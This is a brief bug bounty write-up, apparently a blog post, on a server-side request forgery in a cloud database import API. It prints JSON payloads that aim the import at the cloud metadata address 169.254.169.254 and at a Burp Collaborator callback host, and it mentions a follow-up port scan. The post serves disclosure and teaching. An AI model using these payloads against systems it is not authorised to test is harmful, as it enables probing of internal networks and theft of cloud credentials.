July 15, 2026
How I Turned a Database Import Feature into an Internal Network Scanner: The Art of the SSRF…
Hi Hackers For confidentiality reasons, I’ll refer to the target simply as Target. While testing Target’s cloud database platform, I found…
By Rootxsecurity
1 min read
Hi Hackers For confidentiality reasons, I'll refer to the target simply as Target. While testing Target's cloud database platform, I found an SSRF in the database import feature. Instead of uploading a file, you can give it a URL and the server fetches it for you:
POST /api/v1/bdbs/{db_id}/actions/importPOST /api/v1/bdbs/{db_id}/actions/importThe import supports six sources: S3, Azure, Google Cloud, FTP, HTTP, HTTPS. Any time a server fetches a URL you control, it's worth testing for SSRF. I first tried the S3 option, pointing it at the AWS metadata service instead of a real bucket:
{
"storageSettings": {
"urls": "s3://169.254.169.254/file.txt",
"type": "s3"
}
}{
"storageSettings": {
"urls": "s3://169.254.169.254/file.txt",
"type": "s3"
}
}Nothing came back, request just failed silently.
Next I switched the type to http and pointed it at a Burp Collaborator URL instead:
{
"storageSettings": {
"urls": "http://<collaborator-id>.burpcollaborator.net/file.txt",
"type": "http"
}
}{
"storageSettings": {
"urls": "http://<collaborator-id>.burpcollaborator.net/file.txt",
"type": "http"
}
}Sent it, checked the Collaborator poll tab, and got a hit — an HTTP interaction with the source IP of the server that made the request. Confirmed: the backend was blindly fetching whatever URL I gave it.
To confirm this was a real, reachable service and not just a blind callback, I ran a port scan against the leaked IP, which came back live with open services.
Root cause: the endpoint validated that the urls field looked like a URL, but never restricted where that URL could actually point. The server trusted the format, not the destination.
Impact:
SSRF from an authenticated, low-privilege action
Leaks internal server IPs
Possible route to internal-only services
Affects all six supported import protocols
Happy Hacking !
Acknowledgments: We would like to thank our team member 0xno_one
for discovering this authentication vulnerability and preparing this Writeup.